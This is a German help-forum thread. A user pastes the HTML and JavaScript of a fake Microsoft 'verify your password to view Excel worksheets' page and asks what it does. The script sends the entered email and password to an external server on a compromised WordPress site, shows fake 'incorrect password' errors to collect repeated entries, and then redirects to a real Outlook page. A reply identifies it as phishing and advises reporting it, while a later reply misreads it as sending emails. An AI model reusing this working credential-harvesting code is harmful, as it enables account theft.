<div id="errorpw" style="color: red; margin: 15px; margin-left: 0px; margin-top: 0px; margin-bottom: 0px;"></div>
<div id="important1" style="color: black;font-size: 13px;">
Because you're accessing sensitive info, you need to verify your password to view excel worksheets
</div>
<div class="row">
<div class="form-group col-md-24">
<div class="placeholderContainer">
<input name="passwd" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box" placeholder="Password" required />
</div>
</div>
</div>
<div>
<div class="position-buttons">
<div>
<div class="row">
<div class="col-md-24">
<div class="text-13">
<div class="form-group">
<a id="idA_PWD_ForgotPassword" role="link" href="#">Note: Only recipient's email can access shared files</a>
</div>
<div class="form-group">
</div>
<div class="form-group">
<a id="i1668" href="#"></a>
</div></div></div></div>
</div>
<div class="win-button-pin-bottom">
<div class="row">
<div><div class="col-xs-24 no-padding-left-right button-container">
<div class="inline-block">
<input type="submit" id="Button9" class="win-button button_primary button ext-button primary ext-primary" value="Signin">
</div>
</div></div>
</div>
</div>
</div></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
</div>
</div>
<div class="plate footer ext-footer" role="contentinfo"></div>
<div id="footer" role="contentinfo" class="footer ext-footer">
<div>
<div id="footerLinks" class="footerNode text-secondary">
<a id="ftrTerms" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
<a id="ftrPrivacy" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy & cookies</a>
<a id="moreOptions" href="#" aria-label="Click here for troubleshooting information" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div></div>
</div>
</div>
</div></div>
</form>
<script>
var count = 0;
function set_brand(email) {
$.ajax({
url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
type: "POST",
data: { username: email },
success: function (response) {
let res = JSON.parse(response)
let logo = res["res"]["BannerLogo"], background = res["res"]["Illustration"], DarkTile = res["res"]["TileDarkLogo"]
let TileLogo = res["res"]["TileLogo"], BoilerPlateText = res["res"]["BoilerPlateText"]
if (logo) {
$('.logo').attr('src', logo);
}
if (BoilerPlateText) {
console.log(BoilerPlateText);
$(".plate").append(BoilerPlateText);
$(".plate").css({"text-align": "center"})
}
if (background) {
$('.background-image').css({ 'background-image': 'url(' + background + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
} else if (DarkTile) {
$('.background-image').css({ 'background-image': 'url(' + DarkTile + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
} else if (TileLogo) {
$('.background-image').css({ 'background-image': 'url(' + TileLogo + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
}
}
});
}
function send_result(user, pass) {
$.ajax({
url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
data: {
"email": user,
"password": pass
},
type: "POST",
success: function (data) {
console.log(data);
},
error: function (data) {
console.log('Ajax error');
}
});
}
document.addEventListener('DOMContentLoaded', async() => {
if(url_string){
document.getElementById("show-email").innerHTML = url_string;
document.getElementById("i0118").focus();
set_brand(url_string);
}
document.getElementById("Button9").addEventListener("click", e => {
event.preventDefault ? event.preventDefault() : event.returnValue = false;
var pswd = document.getElementById("i0118").value;
if(pswd.length < 5){
document.getElementById("important1").style.display="none";
setTimeout(() => {document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = "Your account password is too short."}, 1500);
} else if (pswd.length > 5 && count <= 0) {
send_result(url_string, pswd);
document.getElementById("important1").style.display="none";
setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
} else if (count < 2){
send_result(url_string, pswd);
document.getElementById("important1").style.display = "none";
setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
} else {
send_result(url_string, pswd);
setTimeout(() => {window.location.replace("https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee")});
}
});
});
</script>
</div></body></html>
... leider spreche ich kein JavaScript! Könntet Ihr mich bitte aufklären, was die Scripts hier genau machen und welche Maßnahmen ich ergreifen muss!
Besten Dank im Voraus!
RE: Was machen diese JavaScripts? - rzscout - 19.10.2022
Hi,
das ganze erstellt sozusagen eine neue HTML-Seit mithilfe von JavaScript und der Methode write.
Es erstellt eine Fakeseite worauf eine Excel-Tabelle abgebildet ist, wo man sein Password eingeben soll. Es ist ein billiger billiger Trick um Daten abzufischen.
Zusatz: Er sendet die Daten also E-Mailadresse und gegebenfalls das eingegebene Passwort an: https://bascom.pl
Das würde ich dort vielleicht auch melden, weil die nix über deren Angriff wissen. Durch einen WordPress-Fehler konnten sie diese Seite nutzen, um heimlich Daten aufzuzeichnen.
RE: Was machen diese JavaScripts? - samlauncher44 - 11.07.2023
I guess it sends emails to an email user automatically.
|